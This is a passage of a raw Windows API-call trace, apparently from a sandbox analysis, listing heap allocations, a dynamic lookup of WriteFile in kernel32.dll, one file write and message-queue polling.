RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0177.927] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0177.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0177.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0177.927] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0177.927] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0177.927] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0177.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def38 [0177.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1b70 [0177.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0177.928] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0177.928] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0177.928] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0177.928] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1890 [0177.928] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0177.928] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0177.928] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df1e0 [0177.928] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0177.928] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0177.928] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0177.928] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc1c8 [0177.928] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0177.928] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0177.928] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0177.928] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0177.928] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0177.928] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc1c8 | out: hHeap=0x8a0000) returned 1 [0177.928] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0177.928] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0177.928] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df1e0 | out: hHeap=0x8a0000) returned 1 [0177.928] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0177.928] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1970 [0177.928] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0177.928] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0177.928] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0177.928] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1b00 [0177.928] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0177.928] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd828 [0177.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df1e0 [0177.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0177.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0177.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0177.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec18 [0177.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0177.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0177.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0177.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deda8 [0177.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0177.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0177.929] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0177.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df168 [0177.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0177.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df208 [0177.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0177.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0177.929] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0177.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debf0 [0177.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0177.929] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0177.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deba0 [0177.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0177.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0177.929] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0177.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defb0 [0177.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0177.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0177.930] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0177.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debc8 [0177.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0177.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0177.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0177.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0177.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0177.930] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0177.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded08 [0177.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0177.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0177.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0177.930] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0177.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0177.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0177.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0177.930] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0177.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0177.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0177.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0177.930] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0177.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0177.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0177.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0177.930] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0177.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0177.931] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0177.931] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0177.931] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0177.931] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0177.931] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0177.931] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0177.931] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0177.931] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0177.931] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0177.931] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0177.931] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0177.931] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0177.931] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0177.931] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0177.931] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded08 | out: hHeap=0x8a0000) returned 1 [0177.931] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0177.931] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0177.931] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0177.931] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0177.931] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0177.931] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0177.931] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0177.931] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0177.931] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0177.931] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0177.931] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0177.931] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0177.931] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0177.932] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0177.932] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0177.932] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0177.932] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0177.932] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2838 [0177.932] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0177.932] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0177.932] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0177.932] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0177.932] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0177.932] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0177.932] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0177.932] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0177.932] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0177.932] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0177.932] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded08 [0177.932] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0177.932] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0177.932] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0177.932] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0177.932] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0177.932] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0177.932] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0177.932] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0177.932] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0177.932] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0177.932] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0177.933] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0177.933] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0177.933] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0177.933] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0177.933] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0177.933] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0177.933] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0177.933] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0177.933] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0177.933] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0177.933] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2638 [0177.933] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0177.933] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0177.933] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0177.933] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0177.933] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0177.933] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2638 [0177.933] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0177.933] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0177.933] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0177.933] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0177.933] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0177.933] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0177.933] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0177.933] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0177.933] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0177.933] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0177.933] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0177.934] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0177.934] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0177.934] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0177.934] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0177.934] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0177.934] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0177.934] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0177.934] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x9ba120, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WriteFile", lpUsedDefaultChar=0x0) returned 10 [0177.934] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0177.934] GetProcAddress (hModule=0x75990000, lpProcName="WriteFile") returned 0x759a1282 [0177.934] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0177.934] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0177.934] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0177.934] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0177.934] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0177.934] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0177.934] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0177.934] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec90 | out: hHeap=0x8a0000) returned 1 [0177.934] WriteFile (in: hFile=0x120, lpBuffer=0x8fff00*, nNumberOfBytesToWrite=0x2691, lpNumberOfBytesWritten=0x87eae0, lpOverlapped=0x0 | out: lpBuffer=0x8fff00*, lpNumberOfBytesWritten=0x87eae0*=0x2691, lpOverlapped=0x0) returned 1 [0177.935] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0177.935] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0177.935] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0177.935] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0177.935] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0177.935] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0177.935] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0177.935] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0177.935] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0177.935] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0177.935] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0177.935] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0177.935] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0177.935] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0177.935] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0177.935] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0177.935] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0177.935] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0177.935] FreeLibrary (hLibModule=0x75990000) returned 1 [0177.935] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0177.935] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0177.935] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0177.935] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0177.935] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0177.935] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded08 | out: hHeap=0x8a0000) returned 1 [0177.935] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0177.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0177.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0177.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0177.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0177.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0177.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0177.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0177.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0177.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0177.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0177.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0177.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0177.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0177.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0177.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0177.936] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0177.936] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, 